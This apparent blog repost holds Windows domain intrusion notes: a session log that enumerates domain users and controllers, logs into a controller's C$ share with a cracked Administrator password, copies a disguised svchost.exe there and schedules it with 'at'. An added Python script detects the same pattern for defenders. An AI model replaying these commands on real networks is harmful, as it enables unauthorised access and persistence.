net user /domain //list domain users
net config server
net config workstation
nltest /dsgetdc:mydomain //show the domain controller's IP
net group "domain computers" /domain //list the domain's member machines
---------------------------------------------------------------------------------------------------------------------
//The domain controller administrator's password has already been cracked
C:\>net use \\192.168.1.153 "123456" /user:mydomain\Administrator
The command completed successfully.
C:\>dir \\192.168.1.153\C$
Volume in drive \\192.168.1.153\C$ has no label.
Volume Serial Number is C6BC-1F87
Directory of \\192.168.1.153\C$
C:\>copy C:\programdata\svchost.exe \\192.168.1.153\C$\Intel\svchost.exe
1 file(s) copied.
C:\>at \\192.168.1.153
There are no entries in the list.
C:\>net time \\192.168.1.153
Current time at \\192.168.1.153 is 7/20/2013 4:02:25 PM
The command completed successfully.
C:\>at \\192.168.1.153 16:04 C:\Intel\svchost.exe
Added a new job with job ID = 1
C:\>at \\192.168.1.153
Status ID Day Time Command Line
-------------------------------------------------------------------------------
1 Today 4:04 PM C:\Intel\svchost.exe
C:\>net use \\192.168.1.153 /del
\\192.168.1.153 was deleted successfully.
---------------------------------------------------------------------------------
OKOK!
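
The same session seen from the defender's side, as an added example that is not part of the original notes: it correlates recorded command lines per remote host and reports when a file copied to an admin share (`\\host\C$`) is then scheduled with `at`, the pattern shown above. The sample lines are constructed from the session in these notes, and `detect` and the finding field names are hypothetical.

```python
import re
from collections import defaultdict

# Constructed sample: command lines as process-creation auditing might record
# them, mirroring the session in these notes (same host, paths and account).
SAMPLE = [
    r'net use \\192.168.1.153 "123456" /user:mydomain\Administrator',
    r'copy C:\programdata\svchost.exe \\192.168.1.153\C$\Intel\svchost.exe',
    r'net time \\192.168.1.153',
    r'at \\192.168.1.153 16:04 C:\Intel\svchost.exe',
    r'net use \\192.168.1.153 /del',
]

HOST = r'\\\\(?P<host>[^\\\s]+)'
NET_USE = re.compile(r'^net\s+use\s+' + HOST + r'.*?/user:(?P<user>\S+)', re.I)
COPY = re.compile(r'^(?:copy|xcopy|move)\s+\S+\s+' + HOST
                  + r'\\(?P<drive>[a-z])\$(?P<path>\\\S+)', re.I)
AT_JOB = re.compile(r'^at(?:\.exe)?\s+' + HOST
                    + r'\s+(?P<time>\d{1,2}:\d{2})\s+(?P<cmd>.+)$', re.I)
SYSTEM_DIR = re.compile(r'\\windows\\(?:system32|syswow64)\\', re.I)

def detect(cmdlines):
    """Flag remote hosts where a file copied to an admin share is then scheduled with at."""
    state = defaultdict(lambda: {"user": None, "dropped": set()})
    findings = []
    for line in cmdlines:
        line = line.strip()
        if m := NET_USE.match(line):
            state[m["host"]]["user"] = m["user"]
        elif m := COPY.match(line):
            # \\host\C$\Intel\x.exe is C:\Intel\x.exe on the remote machine
            state[m["host"]]["dropped"].add(f'{m["drive"]}:{m["path"]}'.lower())
        elif m := AT_JOB.match(line):
            cmd = m["cmd"].strip().strip('"').lower()
            seen = state[m["host"]]
            hit = next((p for p in seen["dropped"] if cmd.startswith(p)), None)
            if hit:
                name = hit.rsplit("\\", 1)[-1]
                findings.append({
                    "host": m["host"], "user": seen["user"], "time": m["time"],
                    "path": hit,
                    # svchost.exe outside the Windows system directories is suspicious
                    "masquerade": name == "svchost.exe" and not SYSTEM_DIR.search(hit),
                })
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(finding)
```

It only covers the `at` form used in these notes; an `at` job for a path that was never copied to the host's admin share in the same log produces no finding.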
When reposting, please credit: exchen's blog » Domain environment intrusion notes